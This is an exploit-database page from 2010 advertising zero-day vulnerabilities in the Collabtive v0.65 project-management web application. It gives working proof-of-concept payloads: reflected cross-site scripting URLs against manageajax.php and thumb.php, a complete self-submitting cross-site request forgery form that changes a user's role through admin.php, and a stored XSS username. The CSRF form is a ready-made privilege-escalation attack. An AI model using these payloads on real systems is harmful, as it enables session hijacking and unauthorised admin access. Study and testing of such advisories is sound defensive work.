Home / os / win7

[webapps / 0day] - Collabtive v0.65 Multiple Vulnerabilities

Posted on 12 October 2010

<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Collabtive v0.65 Multiple Vulnerabilities | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Collabtive v0.65 Multiple Vulnerabilities in webapps / 0day | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>=========================================
Collabtive v0.65 Multiple Vulnerabilities
=========================================

### VULNERABLE PRODUCT ###
+ Description: &quot;Collabtive provides a web based platform to bring the
project
management process and documentation online. Collabtive is an open
source solution
with features and functionality similar to proprietary software such as
BaseCamp.&quot;
+ Homepage: http://www.collabtive.com
 
 
 
### VULNERABILITY DETAILS ###
 
I. Non-persistent Cross-site Scripting
--------------------------------------
+ Description: Application insert HTTP &quot;y&quot; parameter in &quot;manageajax.php&quot;
and HTTP &quot;pic&quot;
parameter in &quot;thumb.php&quot; into html output and fails while sanitize user
supplied these
inputs. Attackers can execute malicious javascript codes or hijacking
PHPSESSID for
privilege escalation.
 
+ Exploit/POC:
http://target/manageajax.php?action=newcal&amp;y=&lt;script&gt;alert(/XSS/)&lt;/script&gt;
http://target/thumb.php?pic=&lt;script&gt;alert(/XSS/)&lt;/script&gt;
 
 
II. Cross-site Request Forgery
------------------------------
+ Description: Collabtive affects from Cross-site Request Forgery.
Technically, attacker
can create a specially crafted page and force collabtive administrators
to visit it and
can gain administrative privilege. For prevention from CSRF
vulnerabilities, application
needs anti-csrf token, captcha and asking old password for critical actions.

 
--&gt;
&lt;html&gt;
&lt;head&gt;
&lt;title&gt;Collabtive CSRF P0C&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;form method=&quot;post&quot; action=&quot;http://collabtive/admin.php?action=edituser&amp;id=2&quot; enctype=&quot;multipart/form-data&quot; name=&quot;csrfXploit&quot;&gt;
    &lt;input type=&quot;hidden&quot; value=&quot;hacker&quot; name=&quot;name&quot; /&gt;
    &lt;input type=&quot;hidden&quot; value=&quot;hacker@hacker&quot; name=&quot;email&quot; /&gt;
    &lt;input type=&quot;hidden&quot; value=&quot;m&quot; name=&quot;gender&quot; /&gt;
    &lt;input type=&quot;hidden&quot; value=&quot;en&quot; name=&quot;locale&quot; /&gt;
    &lt;input type=&quot;hidden&quot; value=&quot;&quot; name=&quot;admin&quot; /&gt;
    &lt;input type=&quot;hidden&quot; value=&quot;1&quot; name=&quot;role&quot;&gt;
  &lt;/form&gt;
  &lt;script type=&quot;text/javascript&quot;&gt;
    document.csrfXploit.submit();
  &lt;/script&gt;
&lt;/body&gt;
&lt;/html&gt;
 
 
III. Stored Cross-site Scripting
--------------------------------
+ Description: Collabtive has Stored Cross-site Scripting vulnerability.
Every user can
change their usernames and application allows HTML codes and stores in
database.
 
+ Exploit/POC: Change username to &quot;user&lt;script&gt;alert(/AS/)&lt;/script&gt;&quot;.


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-12]</pre></body></html>

 

TOP

Malware :

Exploits :